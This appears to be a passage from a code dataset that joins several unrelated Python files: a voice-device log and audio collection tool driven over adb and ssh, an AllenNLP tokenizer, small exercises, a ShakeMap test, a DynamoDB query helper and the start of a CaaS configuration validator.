\"\"\"\n global L, stop_self\n time.sleep(float(no) / 10.0 * 3)\n td[int(no)] = time.time()\n # Launch the command as subprocess.\n process = subprocess.Popen(command, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE,\n shell=True)\n # Launch the asynchronous readers of the process' stdout and stderr.\n stdout_queue = Queue.Queue()\n stdout_reader = AsynchronousFileReader(process.stdout, stdout_queue)\n stdout_reader.start()\n stderr_queue = Queue.Queue()\n stderr_reader = AsynchronousFileReader(process.stderr, stderr_queue)\n stderr_reader.start()\n # Check the queues if we received some output (until there is nothing more to get).\n # frame.txt_log.write(('No%s_' % str(int(no) + 1)) + ACTIVE_DEVICES[int(no)] + u' <<<开始>>>' + '\\r')\n print(('No%s_' % str(int(no) + 1)) + ACTIVE_DEVICES[int(no)] + u' <<<开始>>>' + '\\r')\n mod = MODULE()\n cm = mods[int(no)]\n while not stdout_reader.eof() or not stderr_reader.eof():\n if stop_self or restart_self:\n break\n while not stdout_queue.empty():\n line = stdout_queue.get().decode(\"utf-8\", errors=\"ignore\")\n try:\n if is_save_log:\n logs[int(no)].write(line)\n mod.main_doing(line, cm, no)\n except Exception as e1:\n print('\\033[1;31m错误: ' + repr(e1) + '\\033[0m')\n # frame.txt_log.write(repr(e))\n while not stderr_queue.empty():\n line = stderr_queue.get().decode('utf-8')\n if 'has been replaced' in line or 'EOF' in line or line is None:\n continue\n print('\\033[1;31m错误: 设备-' + ACTIVE_DEVICES[int(no)] + str(line) + '\\033[0m')\n stop_self = True\n break\n # Sleep a bit before asking the readers again.\n time.sleep(.1)\n if is_save_log:\n logs[int(no)].close()\n process.kill()\n if no == '0':\n if stop_self:\n time.sleep(.5)\n t.kill_self()\n elif restart_self:\n print('\\n\\033[1;31m=======停止=======\\033[0m')\n time.sleep(.3)\n start_main()\n # Let's be tidy and join the threads we've started.\n # stdout_reader.join()\n # stderr_reader.join()\n # Close subprocess' file 
descriptors.\n # process.stdout.close()\n # process.stderr.close()\n\n # process.kill()\n # kill_self()\n\n\ndef get_device_list():\n device_sn_list = []\n m_file = os.popen(\"adb devices\")\n for line in m_file.readlines():\n # line = line.encode('utf-8')\n if line.find(\"List of devices attached\") != -1 or line.find('start') != -1 or line.find('daemon') != -1:\n continue\n elif len(line) > 5:\n device_sn_list.append(line.split(\"\\t\")[0])\n m_file.close()\n return device_sn_list\n\n\nclass ThreadLogcat(threading.Thread):\n\n def __init__(self, no):\n threading.Thread.__init__(self)\n self.no = no\n self.start()\n\n def run(self):\n global DATA, CURRENT_MODULE\n DATA = {}\n # _start_d = get_device_list()[CURRENT_DEVICE]\n _d = ACTIVE_DEVICES[self.no]\n CURRENT_MODULE = mods[self.no]\n if CURRENT_MODULE == MOD_XIAODUBOX:\n res = os.popen('ssh root@%s ls /tmp | grep speech' % _d).readlines()[0][:-1]\n consume('ssh root@%s tail -F /tmp/%s' % (_d, res), str(self.no))\n elif CURRENT_MODULE == MOD_XGP:\n consume('adb -s %s shell tail -F /tmp/speechsdk.log' % _d, str(self.no))\n elif CURRENT_MODULE == MOD_esp32:\n consume('tail -F %s' % sys.argv[self.no + 1], str(self.no))\n else:\n os.popen('adb -s %s logcat -c' % _d).close()\n consume(\"adb -s %s logcat -v time\" % _d, str(self.no))\n\n\nclass Tools(object):\n\n def __init__(self):\n self.finish_count = 0\n self.audio_path = 'audio'\n\n @staticmethod\n def save_full_log(no):\n p = sys.argv[0].split('/')\n dev = ACTIVE_DEVICES[int(no)]\n log_path = '/%s/%s/Desktop/audio/%s/%s.txt' % (p[1], p[2], dev, dev)\n if not os.path.exists(log_path[:log_path.rfind('/')]):\n os.makedirs(log_path[:log_path.rfind('/')])\n f = open(log_path, 'a')\n return f\n\n def pull_audio(self, dir_name):\n global CURRENT_MODULE\n DATA.clear()\n self.finish_count = 0\n print('\\033[1;36m音频导出中......\\033[0m\\n')\n dir_name = dir_name.split(' ')\n if len(dir_name) == 1:\n dir_name = 'audio'\n else:\n dir_name = dir_name[1]\n self.audio_path = dir_name\n for i, dev in enumerate(ACTIVE_DEVICES):\n CURRENT_MODULE = mods[i]\n p = sys.argv[0].split('/')\n save_path = '/%s/%s/Desktop/audio/%s/%s' % (p[1], p[2], dev, dir_name)\n if not os.path.exists(save_path):\n os.makedirs(save_path)\n if CURRENT_MODULE in (MOD_AINEMO_DEMO, MOD_AINEMO_LAUNCHER):\n from_path = '/data/log/'\n elif CURRENT_MODULE in (MOD_AINEMO_1S, MOD_AINEMO_1C, MOD_AINEMO_1L_DEMO):\n from_path = 'mnt/aud_rec/'\n elif CURRENT_MODULE in (MOD_HUAWEI_DEMO, MOD_HUAWEI_LAUNCHER, MOD_CW_LAUNCHER, MOD_CW_DEMO):\n from_path = '/data/local/tmp/aud_rec/'\n elif CURRENT_MODULE in (MOD_CW_BOX, MOD_CW_BOX_DEMO, MOD_Max, MOD_VENUS):\n from_path = '/data/local/aud_rec/'\n else:\n print('\\n\\033[1;31m该设备不支持\\033[0m')\n self.finish_count += 1\n if self.finish_count == len(ACTIVE_DEVICES):\n print('\\033[1;36m\\n导出完毕\\033[0m\\n')\n self.savelog_after_move()\n continue\n cmd = 'adb -s %s pull %s %s' % (dev, from_path, save_path)\n threading.Thread(target=self.__pull, args=(cmd, dev)).start()\n\n def __pull(self, cmd, dev):\n sp = subprocess.Popen(cmd, shell=True,\n stdout=subprocess.PIPE)\n for line in iter(sp.stdout.readline, ''):\n line = line.decode()[:-1]\n if 'No such file or directory' in line:\n print('\\n\\033[1;31m设备 %s 没有音频\\033[0m' % dev)\n self.finish_count += 1\n break\n if line == '':\n self.finish_count += 1\n break\n print(line, end='\\r')\n sp.kill()\n if self.finish_count == len(ACTIVE_DEVICES):\n print('\\033[1;36m\\n导出完毕\\033[0m\\n')\n self.savelog_after_move()\n\n def savelog_after_move(self):\n if 
is_save_log:\n ls = t.log()\n for l in ls:\n np = l.name[:l.name.rfind('/') + 1] + self.audio_path + '/' + l.name[l.name.rfind('/') + 1:]\n os.rename(l.name, np)\n t.log()\n\n @staticmethod\n def restart_app():\n global CURRENT_MODULE\n DATA.clear()\n activities = {\n MOD_CW_LAUNCHER: 'com.skyworth.lafite.srtnj.speechserver/'\n 'com.skyworth.lafite.srtnj.setting.SkyLafiteSettingHomeActivity',\n MOD_HUAWEI_LAUNCHER: 'com.baidu.launcher/com.baidu.duer.home.activity.HomeActivity',\n MOD_HUAWEI_DEMO: 'com.baidu.speech.demo/com.baidu.speech.demo.ActivityWakeupAndAsr',\n MOD_Max: 'com.baidu.muses.vera/none',\n MOD_CW_BOX: 'com.baidu.muses.vera/none',\n MOD_AINEMO_LAUNCHER: 'vulture.app.home/vulture.app.home.HomeActivity',\n MOD_AINEMO_DEMO: 'com.baidu.speech.demo/com.baidu.speech.demo.ActivityMain',\n MOD_CW_BOX_DEMO: 'com.baidu.speech.demo/com.baidu.speech.demo.ActivityWakeupAndAsr',\n MOD_AINEMO_1S: 'com.baidu.launcher/com.baidu.duershow.launcher.home.ui.activity.HomeActivity',\n MOD_AINEMO_1L_DEMO: 'com.baidu.speech.demo/com.baidu.speech.demo.ActivityWPASREvent',\n MOD_AINEMO_1C: 'com.baidu.launcher/com.baidu.duershow.launcher.home.ui.activity.HomeActivity',\n MOD_VENUS: 'com.baidu.spil.e2edueros/copen om.baidu.spil.e2edueros.ShowInfoActivity'\n }\n\n for i, dev in enumerate(ACTIVE_DEVICES):\n CURRENT_MODULE = mods[i]\n if CURRENT_MODULE in activities.keys():\n print('\\033[1;36m重启APP\\033[0m\\n')\n if CURRENT_MODULE in (MOD_AINEMO_LAUNCHER,):\n os.popen('adb -s %s shell rm data/log/*.raw' % dev).close()\n os.popen('adb -s %s shell rm data/log/logcat_full.log.*' % dev).close()\n stop = 'adb -s %s shell am force-stop %s 2>/dev/null' % (dev, activities[CURRENT_MODULE].split('/')[0])\n if not activities[CURRENT_MODULE].endswith('none'):\n start = 'adb -s %s shell am start %s 2>/dev/null' % (dev, activities[CURRENT_MODULE])\n os.popen(stop).close()\n os.popen(start).close()\n else:\n print('\\n\\033[1;31m该设备不支持\\033[0m')\n\n @staticmethod\n def reboot_dev():\n global CURRENT_MODULE\n print('\\033[1;36m设备重启\\033[0m\\n')\n for i, dev in enumerate(ACTIVE_DEVICES):\n CURRENT_MODULE = mods[i]\n if CURRENT_MODULE == MOD_XIAODUBOX:\n threading.Thread(target=lambda: os.popen('ssh root@%s reboot' % dev).close()).start()\n else:\n threading.Thread(target=lambda: os.popen('adb -s %s reboot' % dev).close()).start()\n\n @staticmethod\n def kill_self():\n print('\\n\\033[1;31m=======退出=======\\033[0m')\n pids = psutil.pids()\n for pid in pids:\n if psutil.Process(pid).name() in sys.argv[0]:\n psutil.Process(pid).kill()\n\n @staticmethod\n def select_mod(_index=-1):\n if _index == -1:\n return len(MOD_LIST)\n _index = int(_index)\n if _index >= len(MOD_LIST) or _index < 0:\n raise IndexError\n return MOD_LIST[_index]\n\n def show_mods(self):\n for i in range(self.select_mod()):\n print('%d.%s' % (i, self.select_mod(i)))\n\n @staticmethod\n def save_memory(filename, _content):\n mp = str(filename[:filename.rfind('\\\\')])\n if not os.path.exists(mp):\n os.makedirs(mp)\n with open(filename, \"a+\") as f:\n f.write(_content)\n\n @staticmethod\n def log():\n global is_save_log\n if is_save_log:\n is_save_log = False\n for log in logs:\n log.close()\n print('\\033[1;36m关闭抓取日志\\033[0m\\n')\n else:\n logs.clear()\n is_save_log = True\n for i in range(len(ACTIVE_DEVICES)):\n logs.append(t.save_full_log(i))\n print('\\033[1;36m开始抓取日志\\033[0m\\n')\n return logs\n\n\nclass InputWatcher(threading.Thread):\n\n def __init__(self):\n threading.Thread.__init__(self)\n self.start()\n\n def run(self):\n global stop_self, 
only_wakeup, restart_self, is_save_log\n while not stop_self and not restart_self:\n cmd = input()\n if cmd == 'c':\n DATA.clear()\n print('\\033[1;36m唤醒次数归零\\033[0m\\n')\n elif cmd == 'q':\n stop_self = True\n elif cmd == 's':\n restart_self = True\n DATA.clear()\n elif cmd == 'restart':\n t.restart_app()\n elif cmd == 'reboot':\n restart_self = True\n t.reboot_dev()\n elif cmd.startswith('p'):\n t.pull_audio(cmd)\n wp = 'status=1'\n for i, d in enumerate(ACTIVE_DEVICES):\n if mods[i] in (MOD_AINEMO_LAUNCHER,):\n file = 'data/log/test_info.txt'\n elif mods[i] in (MOD_AINEMO_1C, MOD_AINEMO_1S):\n file = 'data/local/aud_rec/alg_wake_info_0'\n elif mods[i] in (MOD_CW_LAUNCHER, MOD_CW_DEMO):\n file = 'data/local/tmp/aud_rec/alg_wake_info_0'\n elif mods[i] in (MOD_CW_BOX, ):\n file = 'data/local/aud_rec/alg_wake_*'\n else:\n file = ''\n wp = ''\n if file == '':\n continue\n res = \\\n os.popen(\n 'adb -s %s shell cat %s|grep %s |wc -l' % (d, file, wp)).readlines()[\n 0]\n print('设备%s唤醒次数为:%s' % (d, res.strip()))\n elif cmd == 'w':\n if only_wakeup:\n only_wakeup = False\n print('\\033[1;36m唤醒模式关闭\\033[0m\\n')\n\n else:\n only_wakeup = True\n print('\\033[1;36m唤醒模式开启\\033[0m\\n')\n elif cmd == 'log':\n t.log()\n\n\ndef show_help():\n os.system('clear')\n mhelp = '''选好设备类型、设备连接顺序后可进行导音频、重启等操作,在终端中输入指令后按回车键即可。\n 如果要使用模式15(esp32),需要在工具运行前传入参数,操作为:打开终端,将工具拖入,然后依次将日志文件拖入即可。\n \n 输入 w :切换唤醒/识别模式\n 输入 c :归零唤醒次数\n 输入 reboot :重启设备\n 输入 restart :重启APP\n 输入 q :退出程序\n 输入 s :停止当前模式并回到选择界面\n 输入 p [name] :导音频至'~/Desktop/audio/deviceSN/name'下,'deviceSN'为设备号,name缺省值为'audio'\n 输入 log :开始/关闭抓取日志,临时保存到~/Desktop/audio/deviceSN/deviceSN.txt。当执行导音频操作后,\n 将日志移动到音频路径下,并在临时路径下重新保存日志。\n \n百度Hi:郭玉强\n\\033[1;36m按回车键继续\\033[0m\n '''\n print(mhelp)\n input()\n os.system('clear')\n start_main()\n\n\ndef single_mod(mod):\n global CURRENT_MODULE\n CURRENT_MODULE = t.select_mod(mod)\n print('\\033[1;34m当前模式:' + CURRENT_MODULE + '\\033[0m')\n if CURRENT_MODULE == MOD_esp32:\n if len(sys.argv) == 1:\n raise ValueError\n for ag in sys.argv[1:]:\n ACTIVE_DEVICES.append(ag)\n elif CURRENT_MODULE != MOD_XIAODUBOX:\n dev = get_device_list()\n print(dev)\n if len(dev) == 1:\n order = '0'\n else:\n order = input('\\033[1;36m请输入设备连接顺序,以空格区分(0为起始)\\033[0m\\n').split()\n if not order:\n order = [x for x in range(len(dev))]\n for o in order:\n ACTIVE_DEVICES.append(dev[int(o)])\n else:\n ips = input('\\033[1;36m顺序输入设备ip,以逗号分割\\033[0m\\n')\n dev = ips.split(',')\n order = [i for i in range(len(dev))]\n for o in order:\n ACTIVE_DEVICES.append(dev[int(o)])\n for i in range(len(ACTIVE_DEVICES)):\n mods.append(CURRENT_MODULE)\n for i in range(len(ACTIVE_DEVICES)):\n ThreadLogcat(i)\n InputWatcher()\n\n\ndef multi_mod(ms):\n pm = ''\n\n for m in ms:\n pm += t.select_mod(m) + '、'\n print('\\033[1;34m当前模式:' + pm[:-1] + '\\033[0m')\n dev = get_device_list()\n print(dev)\n order = input('\\033[1;36m请输入设备连接顺序,以空格区分(0为起始)\\033[0m\\n').split()\n if not order:\n order = [x for x in range(len(dev))]\n if len(order) != len(ms):\n raise ValueError\n for o in order:\n ACTIVE_DEVICES.append(dev[int(o)])\n for mod in pm.split('、'):\n mods.append(mod)\n for i in range(len(ACTIVE_DEVICES)):\n ThreadLogcat(i)\n InputWatcher()\n\n\ndef start_main():\n global only_wakeup, CURRENT_MODULE, stop_self, restart_self, is_save_log, ACTIVE_DEVICES, CURRENT_MODULE\n ACTIVE_DEVICES.clear()\n logs.clear()\n mods.clear()\n stop_self = restart_self = False\n only_wakeup = is_save_log = False\n dev = get_device_list()[0]\n print(dev)\n CURRENT_MODULE = MOD_CW_DEMO\n 
ACTIVE_DEVICES.append(dev)\n mods.append(CURRENT_MODULE)\n ThreadLogcat(0)\n\n # t.show_mods()\n # print('\\033[1;33m输入 h 查看帮助\\033[0m')\n # try:\n # mod = input('\\033[1;36m请选择设备类型:\\033[0m')\n # if mod == 'h':\n # show_help()\n # elif mod == 'q':\n # t.kill_self()\n # elif len(mod.split()) == 1:\n # single_mod(mod)\n # else:\n # multi_mod(mod.split())\n # except (ValueError, IndexError):\n # os.system('clear')\n # print('\\033[1;31m错误:输入不合法!!!重新输入 \\033[0m')\n # start_main()\n\n\nif __name__ == '__main__':\n t = Tools()\n try:\n # os.system('clear')\n start_main()\n except KeyboardInterrupt:\n pass\n except Exception as e:\n print(repr(e))\n","sub_path":"com/guo/AGR_for_Mac_tmp.py","file_name":"AGR_for_Mac_tmp.py","file_ext":"py","file_size_in_byte":38525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"125005865","text":"import logging\nfrom typing import List\n\nfrom overrides import overrides\nfrom transformers.tokenization_auto import AutoTokenizer\n\nfrom allennlp.data.tokenizers.token import Token\nfrom allennlp.data.tokenizers.tokenizer import Tokenizer\n\nlogger = logging.getLogger(__name__)\n\n\n@Tokenizer.register(\"pretrained_transformer\")\nclass PretrainedTransformerTokenizer(Tokenizer):\n \"\"\"\n A ``PretrainedTransformerTokenizer`` uses a model from HuggingFace's\n ``transformers`` library to tokenize some input text. This often means wordpieces\n (where ``'AllenNLP is awesome'`` might get split into ``['Allen', '##NL', '##P', 'is',\n 'awesome']``), but it could also use byte-pair encoding, or some other tokenization, depending\n on the pretrained model that you're using.\n\n We take a model name as an input parameter, which we will pass to\n ``AutoTokenizer.from_pretrained``.\n\n We also add special tokens relative to the pretrained model and truncate the sequences.\n\n This tokenizer also indexes tokens and adds the indexes to the ``Token`` fields so that\n they can be picked up by ``PretrainedTransformerIndexer``.\n\n Parameters\n ----------\n model_name : ``str``\n The name of the pretrained wordpiece tokenizer to use.\n add_special_tokens: ``bool``, optional, (default=True)\n If set to ``True``, the sequences will be encoded with the special tokens relative\n to their model.\n max_length: ``int``, optional (default=None)\n If set to a number, will limit the total sequence returned so that it has a maximum length.\n If there are overflowing tokens, those will be added to the returned dictionary\n stride: ``int``, optional (default=0)\n If set to a number along with max_length, the overflowing tokens returned will contain some tokens\n from the main sequence returned. 
The value of this argument defines the number of additional tokens.\n truncation_strategy: ``str``, optional (default='longest_first')\n String selected in the following options:\n - 'longest_first' (default) Iteratively reduce the input sequence until the input is under max_length\n starting from the longest one at each token (when there is a pair of input sequences)\n - 'only_first': Only truncate the first sequence\n - 'only_second': Only truncate the second sequence\n - 'do_not_truncate': Do not truncate (raise an error if the input sequence is longer than max_length)\n\n Argument descriptions are from\n https://github.com/huggingface/transformers/blob/155c782a2ccd103cf63ad48a2becd7c76a7d2115/transformers/tokenization_utils.py#L691\n \"\"\"\n\n def __init__(\n self,\n model_name: str,\n add_special_tokens: bool = True,\n max_length: int = None,\n stride: int = 0,\n truncation_strategy: str = \"longest_first\",\n ) -> None:\n self._tokenizer = AutoTokenizer.from_pretrained(model_name)\n self._add_special_tokens = add_special_tokens\n self._max_length = max_length\n self._stride = stride\n self._truncation_strategy = truncation_strategy\n\n def _tokenize(self, sentence_1: str, sentence_2: str = None):\n \"\"\"\n This method works on both a single sentence and a sentence pair.\n \"\"\"\n # TODO(mattg): track character offsets. Might be too challenging to do it here, given that\n # ``transformers`` is dealing with the whitespace...\n\n encoded_tokens = self._tokenizer.encode_plus(\n text=sentence_1,\n text_pair=sentence_2,\n add_special_tokens=self._add_special_tokens,\n max_length=self._max_length,\n stride=self._stride,\n truncation_strategy=self._truncation_strategy,\n return_tensors=None,\n )\n # token_ids contains the final list of ids for both regular and special tokens\n token_ids, token_type_ids = encoded_tokens[\"input_ids\"], encoded_tokens[\"token_type_ids\"]\n\n tokens = []\n for token_id, token_type_id in zip(token_ids, token_type_ids):\n token_str = self._tokenizer.convert_ids_to_tokens(token_id, skip_special_tokens=False)\n tokens.append(Token(text=token_str, text_id=token_id, type_id=token_type_id))\n\n return tokens\n\n def tokenize_sentence_pair(self, sentence_1: str, sentence_2: str) -> List[Token]:\n \"\"\"\n This method properly handles a pair of sentences.\n \"\"\"\n return self._tokenize(sentence_1, sentence_2)\n\n @overrides\n def tokenize(self, text: str) -> List[Token]:\n \"\"\"\n This method only handles a single sentence (or sequence) of text.\n Refer to the ``tokenize_sentence_pair`` method if you have a sentence pair.\n \"\"\"\n return self._tokenize(text)\n","sub_path":"allennlp/data/tokenizers/pretrained_transformer_tokenizer.py","file_name":"pretrained_transformer_tokenizer.py","file_ext":"py","file_size_in_byte":4785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"4103497","text":"# Write a program to prompt the user for hours and rate per hour using input to compute gross pay.\n# Award time-and-a-half for the hourly rate for all hours worked above 40 hours.\n# Put the logic to do the computation of time-and-a-half in a function called computepay() and\n# use the function to do the computation. 
The function should return a value.\n# Use 45 hours and a rate of 10.50 per hour to test the program (the pay should be 498.75).\n# You should use input to read a string and float() to convert the string to a number.\n# Do not name your variable sum or use the sum() function.\n\ndef computepay(hours: float, rate: float):\n if hours <= 40:\n return hours * rate\n elif hours > 40:\n return ((hours - 40) * rate * 1.5) + (40 * rate)\n\nhours = float(input('Hours: '))\nrate = float(input('Rate / Hour: '))\npay = computepay(hours, rate)\nprint(pay)\n","sub_path":"01. Getting Started/05_FuncationSample.py","file_name":"05_FuncationSample.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"589814235","text":"import unittest\n\nfrom eqep.data.eqdata import EQData\nfrom eqep.persisting.kml_saver import *\nfrom eqep.shakemap.display.scales import *\nfrom eqep.shakemap.shakemap_factory import create_shakemap\nfrom eqep.test.utils import img_cmp\n\n\nclass ShakeFactoryTest(unittest.TestCase):\n \"\"\"\n Unit-tests for `create_shakemap()`\n \"\"\"\n\n REF_DIR = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'res',\n 'factory')\n\n # test-ShakeMap parameters\n names = ['ARSA', 'CONA', 'JAVC', 'KBA', 'KRUC',\n 'MOA', 'MORC', 'MYKA', 'OBKA', 'SOKA'] # the names of the stations\n longs = np.array([15.523, 15.862, 17.671, 13.344, 16.395, 14.266, 17.543,\n 13.641, 14.549, 15.033])\n lats = np.array([47.250, 47.928, 48.859, 47.078, 49.062, 47.849, 49.777,\n 46.630, 46.509, 46.678])\n values = np.array([33923, 76942, 18659, 5694, 89586, 15813, 58516,\n 2933, 7372, 7487])\n data = EQData(values, longs, lats, names)\n\n def test_simple(self):\n file = 'shakemap.png'\n\n sm = create_shakemap(self.data, 'multiquadric', 'blue_red', 'plain',\n (100, 100), (13, 18, 46, 50), (10, 8))\n\n sm.calculate()\n sm.save_img(file)\n\n cmp = img_cmp(file, os.path.join(self.REF_DIR,\n 'ref_simple.png'))\n os.remove(file)\n\n self.assertTrue(cmp)\n\n def test_auto(self):\n file = 'shakemap.png'\n\n sm = create_shakemap(self.data, 'multiquadric', 'blue_red', 'plain')\n\n sm.calculate()\n sm.save_img(file)\n\n cmp = img_cmp(file, os.path.join(self.REF_DIR,\n 'ref_auto.png'))\n os.remove(file)\n\n self.assertTrue(cmp)\n\n def test_styles(self):\n file = 'shakemap.png'\n\n sm = create_shakemap(self.data, 'multiquadric', 'blue_red',\n 'plain, labels')\n\n sm.calculate()\n sm.save_img(file)\n\n cmp = img_cmp(file, os.path.join(self.REF_DIR, 'ref_styles.png'))\n os.remove(file)\n\n self.assertTrue(cmp)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"eqep/test/test_factory.py","file_name":"test_factory.py","file_ext":"py","file_size_in_byte":2197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"271317389","text":"# Mr. Miyagi trainee ## project\n# Ask for user input and depending on the response, Mr. Miyagi will respond.\n#\n# prompt user for input\n# Evaluate each input and print the appropriate responses\n# Follow these rules:\n#\n# every time you ask a question --> Mr. Miyagi responds with\n # --> 'Questions are wise, but for now. Wax on, and Wax off!' (DONE)\n# every statement/question must start with Sensei, otherwise:\n # --> 'You are smart, but not wise - address me as Sensei please' (DONE)\n# every time you mention 'block' or 'blocking' --> Mr. Miyagi responds with\n # --> 'Remember, best block, not to be there.' 
(DONE)\n# anything else you say:\n # --> 'do not lose focus. Wax on. Wax off.' (DONE)\n\n# Make it so you keep playing until we say: 'Sensei, I am at peace'\n # --> 'Sometimes, what heart know, head forget' (DONE)\n\nwhile True:\n response = input(\"Speak to Mr. Miyagi. You can exit by saying 'Sensei, I am at peace': \").lower().strip() # user response\n\n if response.find('sensei') == -1:\n print('You are smart, but not wise - address me as Sensei please') # checks to see if sentence begins with 'Sensei'\n\n elif 'block' in response:\n print('Remember, best block, not to be there.') # if block or blocking in response, a specific reply is given\n\n elif response == 'sensei, i am at peace':\n print('Sometimes, what heart know, head forget') # user response breaks the loop\n break\n\n elif response[-1] == '?':\n print('Questions are wise, but for now. Wax on, and Wax off!') # if sentence ends in '?', a specific reply is given\n\n else:\n print(\"Do not lose focus. Wax on. Wax off.\")\n\n","sub_path":"exercise_miyagi.py","file_name":"exercise_miyagi.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"73580938","text":"import boto3\nimport DBAccessKey\nfrom boto3.dynamodb.conditions import Key, Attr\nimport json\nimport decimal\n\naccess_key_id_global=DBAccessKey.DBAccessKey.access_key_id_global\nsecret_access_key_global=DBAccessKey.DBAccessKey.secret_access_key_global\n\n\nclass DecimalEncoder(json.JSONEncoder):\n def default(self, o):\n if isinstance(o, decimal.Decimal):\n if o % 1 > 0:\n return float(o)\n else:\n return int(o)\n return super(DecimalEncoder, self).default(o)\n\n\nclass Filter_db:\n\n response = []\n\n def get_DB(Ref_no, controller):\n\n print(\"Ref no is \"+Ref_no)\n\n dynamodb = boto3.resource('dynamodb', region_name='ap-southeast-2', aws_access_key_id=access_key_id_global,\n aws_secret_access_key=secret_access_key_global)\n table = dynamodb.Table('ME_CFS_DB')\n\n response = table.query(\n KeyConditionExpression=Key('Reference_No').eq(Ref_no)\n )\n if (response['Items']):\n print(\"start of filter\")\n for i in response['Items']:\n #print(i['Reference_No'], \":\", i['Date_Time']) #print selected attributes\n print(json.dumps(i, cls=DecimalEncoder))#print whole database\n\n print(\"end of filter\")\n controller.show_frame(\"FilterPage\")\n\n else:\n print(response['Items'])\n print(\"It is empty\")\n\n\n\n","sub_path":"Filter.py","file_name":"Filter.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"296433486","text":"#!/usr/bin/python\n# Copyright 2019 Nokia\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport json\nimport re\nimport base64\nimport logging\nimport ipaddr\nfrom cmframework.apis import cmvalidator\nfrom cmdatahandlers.api import validation\nfrom cmdatahandlers.api import configerror\n\n\nclass CaasValidationError(configerror.ConfigError):\n def __init__(self, 
description):\n configerror.ConfigError.__init__(\n self, 'Validation error in caas_validation: {}'.format(description))\n\n\nclass CaasValidationUtils(object):\n\n def __init__(self):\n pass\n\n @staticmethod\n def check_key_in_dict(key, dictionary):\n if key not in dictionary:\n raise CaasValidationError(\"{} cannot be found in {} \".format(key, dictionary))\n\n def get_every_key_occurrence(self, var, key):\n if hasattr(var, 'iteritems'):\n for k, v in var.iteritems():\n if k == key:\n yield v\n if isinstance(v, dict):\n for result in self.get_every_key_occurrence(v, key):\n yield result\n elif isinstance(v, list):\n for d in v:\n for result in self.get_every_key_occurrence(d, key):\n yield result\n\n @staticmethod\n def is_optional_param_present(key, dictionary):\n if key not in dictionary:\n logging.info('{} key is not in the config dictionary, since this is an optional '\n 'parameter, validation is skipped.'.format(key))\n return False\n if not dictionary[key]:\n logging.info('Although {} key is in the config dictionary the corresponding value is '\n 'empty, since this is an optional parameter, '\n 'validation is skipped.'.format(key))\n return False\n return True\n\n\nclass CaasValidation(cmvalidator.CMValidator):\n SUBSCRIPTION = r'^cloud\\.caas|cloud\\.hosts|cloud\\.networking|cloud\\.network_profiles$'\n CAAS_DOMAIN = 'cloud.caas'\n HOSTS_DOMAIN = 'cloud.hosts'\n NETW_DOMAIN = 'cloud.networking'\n NETPROF_DOMAIN = 'cloud.network_profiles'\n\n SERV_PROF = 'service_profiles'\n CAAS_PROFILE_PATTERN = 'caas_master|caas_worker'\n CIDR = 'cidr'\n\n DOCKER_SIZE_QUOTA = \"docker_size_quota\"\n DOCKER_SIZE_QUOTA_PATTERN = r\"^\\d*[G,M,K]$\"\n\n HELM_OP_TIMEOUT = \"helm_operation_timeout\"\n\n DOCKER0_CIDR = \"docker0_cidr\"\n\n OAM_CIDR = \"oam_cidr\"\n\n INSTANTIATION_TIMEOUT = \"instantiation_timeout\"\n\n ENCRYPTED_CA = \"encrypted_ca\"\n ENCRYPTED_CA_KEY = \"encrypted_ca_key\"\n\n CLUSTER_NETS = 'cluster_networks'\n TENANT_NETS = 'tenant_networks'\n\n BLOG_FORWARDING = \"infra_log_store\"\n LOG_FORWARDING = \"log_forwarding\"\n URL_PORT_PATTERN = r\"^(?:https?|udp|tcp):(?:\\/\\/)(?:((?:[\\w\\.-]+|\" \\\n r\"\\[(([1-9a-f][0-9a-f]{0,3}|\\:)\\:[1-9a-f][0-9a-f]{0,3}){0,7}\\])\\:[0-9]+))\"\n FLUENTD_PLUGINS = ['elasticsearch', 'remote_syslog']\n INFRA_LOG_FLUENTD_PLUGINS = ['elasticsearch', 'remote_syslog']\n LOG_FW_STREAM = ['stdout', 'stderr', 'both']\n\n DOMAIN_NAME = \"dns_domain\"\n DOMAIN_NAME_PATTERN = r\"^[a-z0-9]([a-z0-9-\\.]{0,253}[a-z0-9])?$\"\n\n def __init__(self):\n cmvalidator.CMValidator.__init__(self)\n self.validation_utils = validation.ValidationUtils()\n self.conf = None\n self.caas_conf = None\n self.caas_utils = CaasValidationUtils()\n\n def get_subscription_info(self):\n return self.SUBSCRIPTION\n\n def validate_set(self, props):\n if not self.is_caas_mandatory(props):\n logging.info(\"{} not found in {}, caas validation is not needed.\".format(\n self.CAAS_PROFILE_PATTERN, self.HOSTS_DOMAIN))\n return\n self.props_pre_check(props)\n self.validate_docker_size_quota()\n self.validate_helm_operation_timeout()\n self.validate_docker0_cidr(props)\n self.validate_oam_cidr(props)\n self.validate_instantiation_timeout()\n self.validate_encrypted_ca(self.ENCRYPTED_CA)\n self.validate_encrypted_ca(self.ENCRYPTED_CA_KEY)\n self.validate_log_forwarding()\n self.validate_networks(props)\n self.validate_dns_domain()\n\n def _get_conf(self, props, domain):\n if props.get(domain):\n conf_str = props[domain]\n else:\n conf_str = self.get_plugin_client().get_property(domain)\n return 
